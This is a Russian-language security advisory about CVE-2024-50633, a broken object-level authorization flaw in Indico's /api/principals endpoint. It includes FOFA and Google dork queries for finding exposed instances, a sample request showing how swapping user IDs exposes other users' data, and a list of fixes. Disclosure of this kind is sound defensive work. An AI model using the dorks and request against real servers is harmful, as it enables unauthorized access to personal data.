
(Обнаружена и сообщена уязвимость BOLA в Indico.)
Уязвимость Broken Object Level Authorization (BOLA) в Indico v3.2.9 позволяет злоумышленникам получать доступ к конфиденциальной информации пользователей путём манипулирования API-запросами.
FOFA : title="Indico" || header="Indico"
Google Dork : intitle:"Indico" inurl:"/event"
/api/principalsPOST /api/principals HTTP/2
Content-Type: application/json
{
"values": ["User:2301"]
}
Изменяя значение User (например, User:2302), злоумышленник может получить доступ к данным другого пользователя.
Шаги для воспроизведения:
🔥 Воздействие Эта уязвимость может раскрыть конфиденциальную информацию других пользователей. Она нарушает границы авторизации, что приводит к потенциальным утечкам данных.
⚙️ Затронутые версии Indico v3.2.9 to v3.3.2
🔧 Как исправить? для [CVE-2024-50633]
Обновите до последней версии: Убедитесь, что ваш экземпляр Indico обновлён до последней исправленной версии, в которой устранена эта уязвимость. Проверьте официальные релизы Indico на наличие обновлений.
Ограничьте доступ к чувствительным конечным точкам: Применяйте строгие средства контроля доступа к API-конечным точкам, таким как /api/principals, чтобы гарантировать, что только авторизованные пользователи могут получить доступ к конфиденциальной информации. Используйте механизмы контроля доступа на основе ролей (RBAC).
Внедрите проверку входных данных: Проверяйте и очищайте вводимые пользователем данные во всех API-запросах, чтобы предотвратить несанкционированный доступ или манипуляции с данными.
Мониторинг и аудит журналов: Регулярно отслеживайте журналы сервера на предмет необычных API-запросов или попыток несанкционированного доступа к /api/principals. Это может помочь выявить попытки эксплуатации.
Используйте брандмауэр веб-приложений (WAF): Развёртывание WAF может обеспечить дополнительный уровень защиты от попыток эксплуатации, обнаруживая и блокируя вредоносные запросы.
🕵️♂️ Сообщил Çetin BİNİCİ